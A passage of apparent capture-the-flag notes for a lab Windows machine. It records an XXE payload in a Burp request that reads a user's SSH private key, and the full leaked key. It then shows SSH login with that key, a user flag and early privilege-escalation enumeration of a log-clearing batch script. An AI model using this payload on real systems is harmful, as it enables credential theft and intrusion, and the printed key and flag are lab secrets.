 Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 X-Powered-By: PHP/7.2.28
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Content-Length: 144
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8

 Your order for ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [Ports]
 COM1:=9600,n,8,1
 has been processed

 * xml entity vulnerability validated

#LFI
BURP > Request > Repeater
 
 Request
 ...
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
 <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
  <order>
   <quantity>1</quantity>
   <item>&test;</item>
   <address>test</address>
  </order>

 Response
 ...
 Your order for -----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEArJgaPRF5S49ZB+Ql8cOhnURSOZ4nVYRSnPXo6FIe9JnhVRrdEiMi
QZoKVCX6hIWp7I0BzN3o094nWInXYqh2oz5ijBqrn+NVlDYgGOtzQWLhW7MKsAvMpqM0fg
HYC5nup5qM8LYDyhLQ56j8jq5mhvEspgcDdGRy31pljOQSYDeAKVfiTOOMznyOdY/Klt6+
ca+7/6ze8LTD3KYcUAqAxDINaZnNrG66yJU1RygXBwKRMEKZrEviLB7dzLElu3kGtiBa0g
DUqF/SVkE/tKGDH+XrKl6ltAUKfald/nqJrZbjDieplguocXwbFugIkyCc+eqSyaShMVk3
PKmZCo3ddxfmaXsPTOUpohi4tidnGO00H0f7Vt4v843xTWC8wsk2ddVZZV41+ES99JMlFx
LoVSXtizaXYX6l8P+FuE4ynam2cRCqWuislM0XVLEA+mGznsXeP1lNL+0eaT3Yt/TpfkPH
3cUU0VezCezxqDV6rs/o333JDf0klkIRmsQTVMCVAAAFiGFRDhJhUQ4SAAAAB3NzaC1yc2
EAAAGBAKyYGj0ReUuPWQfkJfHDoZ1EUjmeJ1WEUpz16OhSHvSZ4VUa3RIjIkGaClQl+oSF
qeyNAczd6NPeJ1iJ12KodqM+Yowaq5/jVZQ2IBjrc0Fi4VuzCrALzKajNH4B2AuZ7qeajP
C2A8oS0Oeo/I6uZobxLKYHA3Rkct9aZYzkEmA3gClX4kzjjM58jnWPypbevnGvu/+s3vC0
w9ymHFAKgMQyDWmZzaxuusiVNUcoFwcCkTBCmaxL4iwe3cyxJbt5BrYgWtIA1Khf0lZBP7
Shgx/l6ypepbQFCn2pXf56ia2W4w4nqZYLqHF8GxboCJMgnPnqksmkoTFZNzypmQqN3XcX
5ml7D0zlKaIYuLYnZxjtNB9H+1beL/ON8U1gvMLJNnXVWWVeNfhEvfSTJRcS6FUl7Ys2l2
F+pfD/hbhOMp2ptnEQqlrorJTNF1SxAPphs57F3j9ZTS/tHmk92Lf06X5Dx93FFNFXswns
8ag1eq7P6N99yQ39JJZCEZrEE1TAlQAAAAMBAAEAAAGAJvPhIB08eeAtYMmOAsV7SSotQJ
HAIN3PY1tgqGY4VE4SfAmnETvatGGWqS01IAmmsxuT52/B52dBDAt4D+0jcW5YAXTXfStq
mhupHNau2Xf+kpqS8+6FzqoQ48t4vg2Mvkj0PDNoIYgjm9UYwv77ZsMxp3r3vaIaBuy49J
ZYy1xbUXljOqU0lzmnUUMVnv1AkBnwXSDf5AV4GulmhG4KZ71AJ7AtqhgHkdOTBa83mz5q
FDFDy44IyppgxpzIfkou6aIZA/rC7OeJ1Z9ElufWLvevywJeGkpOBkq+DFigFwd2GfF7kD
1NCEgH/KFW4lVtOGTaY0V2otR3evYZnP+UqRxPE62n2e9UqjEOTvKiVIXSqwSExMBHeCKF
+A5JZn45+sb1AUmvdJ7ZhGHhHSjDG0iZuoU66rZ9OcdOmzQxB67Em6xsl+aJp3v8HIvpEC
sfm80NKUo8dODlkkOslY4GFyxlL5CVtE89+wJUDGI0wRjB1c64R8eu3g3Zqqf7ocYVAAAA
wHnnDAKd85CgPWAUEVXyUGDE6mTyexJubnoQhqIzgTwylLZW8mo1p3XZVna6ehic01dK/o
1xTBIUB6VT00BphkmFZCfJptsHgz5AQXkZMybwFATtFSyLTVG2ZGMWvlI3jKwe9IAWTUTS
IpXkVf2ozXdLxjJEsdTno8hz/YuocEYU2nAgzhtQ+KT95EYVcRk8h7N1keIwwC6tUVlpt+
yrHXm3JYU25HdSv0TdupvhgzBxYOcpjqY2GA3i27KnpkIeRQAAAMEA2nxxhoLzyrQQBtES
h8I1FLfs0DPlznCDfLrxTkmwXbZmHs5L8pP44Ln8v0AfPEcaqhXBt9/9QU/hs4kHh5tLzR
Fl4Baus1XHI3RmLjhUCOPXabJv5gXmAPmsEQ0kBLshuIS59X67XSBgUvfF5KVpBk7BCbzL
mQcmPrnq/LNXVk8aMUaq2RhaCUWVRlAoxespK4pZ4ffMDmUe2RKIVmNJV++vlhC96yTuUQ
S/58hZP3xlNRwlfKOw1LPzjxqhY+vzAAAAwQDKOnpm/2lpwJ6VjOderUQy67ECQf339Dvy
U9wdThMBRcVpwdgl6z7UXI00cja1/EDon52/4yxImUuThOjCL9yloTamWkuGqCRQ4oSeqP
kUtQAh7YqWil1/jTCT0CujQGvZhxyRfXgbwE6NWZOEkqKh5+SbYuPk08kB9xboWWCEOqNE
vRCD2pONhqZOjinGfGUMml1UaJZzxZs6F9hmOz+WAek89dPdD4rBCU2fS3J7bs9Xx2PdyA
m3MVFR4sN7a1cAAAANZGFuaWVsQEVudGl0eQECAwQFBg==
-----END OPENSSH PRIVATE KEY-----
 has been processed

#
root@htb:~$ mkdir -p targets/daniel.10.129.24.24
root@htb:~$ touch targets/daniel.10.129.24.24/daniel_id_rsa
root@htb:~$ nano targets/daniel.10.129.24.24/daniel_id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNz...
 -----END OPENSSH PRIVATE KEY-----
 
root@htb:~$ chmod 400 daniel_id_rsa

#verify private key validity
root@htb:~$ ssh-keygen -l -f daniel_id_rsa 
 3072 SHA256:OrvhzyMF1OAj02guQWL1vg2TSovi5XIQONohNGrkRzQ daniel@Entity (RSA)

root@htb:~$ ssh -i daniel_id_rsa daniel@10.129.24.24
 ...

#
daniel@MARKUP C:\Users\daniel> dir Desktop 
 Volume in drive C has no label.
 Volume Serial Number is BA76-B4E3

 Directory of C:\Users\daniel\Desktop
 
 03/05/2020  07:18 AM                35 user.txt 
 
 
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
 032d2fc8952a8c24e39c8f0ee9918ef7

#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
 Privilege Name                Description                    State
 ============================= ============================== =======
 SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
 SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

 * nothing pertinent
 
daniel@MARKUP C:\Users\daniel> dir c:\ 
 Volume in drive C has no label.   
 Volume Serial Number is BA76-B4E3 

 Directory of c:\

 03/12/2020  03:56 AM    <DIR>          Log-Management
 07/28/2021  03:38 AM                 0 Recovery.txt

 * these are the only two UNCOMMON files
    - always analyze UNCOMMON files prior to going into a rabbit hole
    
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt 
 blank file

daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
 Volume in drive C has no label. 
 Volume Serial Number is BA76-B4E3

 Directory of c:\Log-Management

 03/06/2020  02:42 AM               346 job.bat

daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat 
 @echo off 
 FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
 IF (%adminTest%)==(Access) goto noAdmin
 for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
 echo.
 echo Event Logs have been cleared!
 goto theEnd
 :do_clear
 wevtutil.exe cl %1
 goto :eof
 :noAdmin
 echo You must run this script as an Administrator!
 :theEnd
 exit

 * understand the purpose of the batch file and what can be manipulated